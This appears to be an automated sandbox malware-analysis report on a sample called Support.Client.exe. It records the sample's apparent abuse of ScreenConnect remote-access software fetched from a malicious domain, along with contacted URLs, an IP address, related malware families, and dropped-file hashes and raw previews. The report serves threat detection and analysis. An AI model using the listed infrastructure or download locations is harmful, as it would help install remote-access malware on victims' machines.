                                                                                                                          http://www.urwpp.deDPleasedfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://crea.alarmasdelsurdfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2137251432.000000001B874000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2137657698.000000001B8CE000.00000004.00000020.00020000.00000000.sdmp, OX50X7XC.log.1.drfalse
                                                                                                                                unknown
                                                                                                                                http://www.zhongyicts.com.cndfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.2525404173.00000251403DA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2940994575.0000000001EA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.sakkal.comdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                                                                                                                                        high
                                                                                                                                        https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exeRdfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.fontbureau.comdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://crea.alarmasdelsScreenConnect.WindowsClient.exe, 00000009.00000002.2137356260.000000001B8A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2525404173.000002514044D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://www.w3.ordfsvc.exe, 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140834000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514089A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crl.ver)svchost.exe, 00000005.00000002.2939687826.000001DEBFA00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exexdfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://crea.alarmasdelsureste.comdfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140639000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140616000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application8jdfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationDvdfsvc.exe, 00000001.00000002.2524053216.000002513E664000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://crea.alarmasdelsureste.com/Bin/S2ScreenConnect.WindowsClient.exe, 00000009.00000002.2137809049.000000001B904000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsCl8dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.carterandcone.comldfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.founder.com.cn/cndfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.fontbureau.com/designers/frere-user.htmldfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationgod&ScreenConnect.WindowsClient.exe, 00000009.00000002.2137356260.000000001B898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationestldfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.configJdfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.jiyu-kobo.co.jp/dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll0.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://www.fontbureau.com/designers8dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationcdScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Cdfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Core.dllcwdfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationXdfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://crea.alarmasdelsureste.comdfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140BC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.configWdfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        104.168.134.232
                                                                                                                                                                                                        0bd0.adrsxpjm0rga0n.deUnited States
                                                                                                                                                                                                        54290HOSTWINDSUSfalse
                                                                                                                                                                                                        IP
                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1579450
                                                                                                                                                                                                        Start date and time:2024-12-22 12:46:06 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 7m 30s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:14
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:Support.Client.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal57.evad.winEXE@17/74@2/2
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 83.3%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 63%
                                                                                                                                                                                                        • Number of executed functions: 197
                                                                                                                                                                                                        • Number of non-executed functions: 24
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 92.122.16.236, 52.168.117.173, 2.22.50.131, 2.22.50.144, 40.126.53.18, 4.175.87.197, 13.107.246.63
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                                                                        • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 2944 because it is empty
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        06:46:57API Interceptor228670x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                        06:46:57API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                        06:46:57API Interceptor1x Sleep call for process: Support.Client.exe modified
                                                                                                                                                                                                        06:47:29API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        fp2e7a.wpc.phicdn.net62f928.msiGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        P0RN-vidz.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        f4p4BwljZt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        hesaphareketi-20-12-2024-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        17345937653b107659e23b9c28725ee4827d5eb205eece8b9a5c90afbbb742a9832aaefaab913.dat-decoded.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                        bg.microsoft.map.fastly.net#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                        Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                        Statements.pdfGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        INVOICE_2279_from_RealEyes Digital LLC (1).pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                        Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        HOSTWINDSUSarm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                        • 192.236.219.113
                                                                                                                                                                                                        lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                        • 23.254.224.41
                                                                                                                                                                                                        Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                                                                                                                                                        • 23.254.224.41
                                                                                                                                                                                                        5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                        • 23.254.224.41
                                                                                                                                                                                                        xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 142.11.240.128
                                                                                                                                                                                                        loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 192.119.104.64
                                                                                                                                                                                                        loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 142.11.240.155
                                                                                                                                                                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 23.254.189.226
                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 23.254.189.241
                                                                                                                                                                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 192.236.246.50
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eNOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.168.134.232
                                                                                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.168.134.232
                                                                                                                                                                                                        HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.168.134.232
                                                                                                                                                                                                        HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.168.134.232
                                                                                                                                                                                                        swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.168.134.232
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 104.168.134.232
                                                                                                                                                                                                        Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.168.134.232
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exestatmentt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                            statsment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                              https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                    setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                      monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                        monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                          pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exestatmentt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                statsment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                                Entropy (8bit):1.307378622011348
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr1:KooCEYhgYEL0In
                                                                                                                                                                                                                                                MD5:3B218DEFC8E823C2BF9FD4F11E4D7DC5
                                                                                                                                                                                                                                                SHA1:A60AD851A1A0E4BE0E87808E104046527A30C902
                                                                                                                                                                                                                                                SHA-256:0E5800BFCDE46DDCC4DE7FC4F63226BFAF8B0AFF09144D0172DC72397515B7DA
                                                                                                                                                                                                                                                SHA-512:95AFD0E247A02CDE61655009E28974CA98959D2A84F32EDA773B5D9A593D3AEF68D511E424FBBE6985425BBFE1C233236ACBE440B9355DF7B94D8A50D4A54888
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x477ec496, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                                Entropy (8bit):0.42216904276338757
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                MD5:4BDB237FDC9019270FEE58C3BB853B4D
                                                                                                                                                                                                                                                SHA1:3571AB93ADC6E4796934922477378D5D199DE59C
                                                                                                                                                                                                                                                SHA-256:55163F8F8BA15CD86B78552E1C204C9842F57AE0F512C5137D80F211ED355AE7
                                                                                                                                                                                                                                                SHA-512:6405EBCC0EA698A4C2896A462CC776DD755E8EC75E7D170FDF2852289CE617073FA677C73C6A68B5405212ED2AA9693C55FC2F96ADD7D7D21FE9781C78FEF0BE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:G~.... .......A.......X\...;...{......................0.!..........{A.9....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................r..9....|....................'a9....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                Entropy (8bit):0.07759687858589415
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YWlyYer4onajn13a/nEnZYblallcVO/lnlZMxZNQl:Izr4ona53qnEnmbAOewk
                                                                                                                                                                                                                                                MD5:12CB2E4DD76AC8122A3E9FECDFD3626C
                                                                                                                                                                                                                                                SHA1:8ADEF2E75B66A51B9F14F540AF0E4D9686C3AF36
                                                                                                                                                                                                                                                SHA-256:A61FA7FF040339826EE95410CCB5C4009B84A3EFE24B4273638C44F0B6F865F6
                                                                                                                                                                                                                                                SHA-512:2450D4A15C6F8288534394E423E288583E370E1399A5ECA0400BDDF84139F5AB86350EF45E1972F2270E4F0397C850788C831C347E5939DA4198BAA899DBF674
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..c.....................................;...{..9....|.......{A..............{A......{A..........{A]..................'a9....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                Entropy (8bit):0.9141864628057161
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:vIF3qP/1m/s9hqvGXyf8QXIDcQvc6QcEVcw3cE/P0c+HbHg/Jg+OgBCXEYcI+16A:gl41m/DP0BU/ojK0ozuiFTZ24IO83E
                                                                                                                                                                                                                                                MD5:7D96BB80CEAC52615835B7D877716CBD
                                                                                                                                                                                                                                                SHA1:04195C0A069C50831F2A0CA8A4B7B1F41B376FCE
                                                                                                                                                                                                                                                SHA-256:86D9C5B65EEA53ECC3F23A71C2EAFF4CAC6B93E36506EC694765D2C2EBFCA8C8
                                                                                                                                                                                                                                                SHA-512:7096992F4911D7531894C9647D962BB88A8C8662468EFC82F607E7CA63F780251E5EBAF81AB718D6223A159113299C03A8B5C1A5215D398C69E6F75BFEFD7FF6
                                                                                                                                                                                                                                                Malicious:false
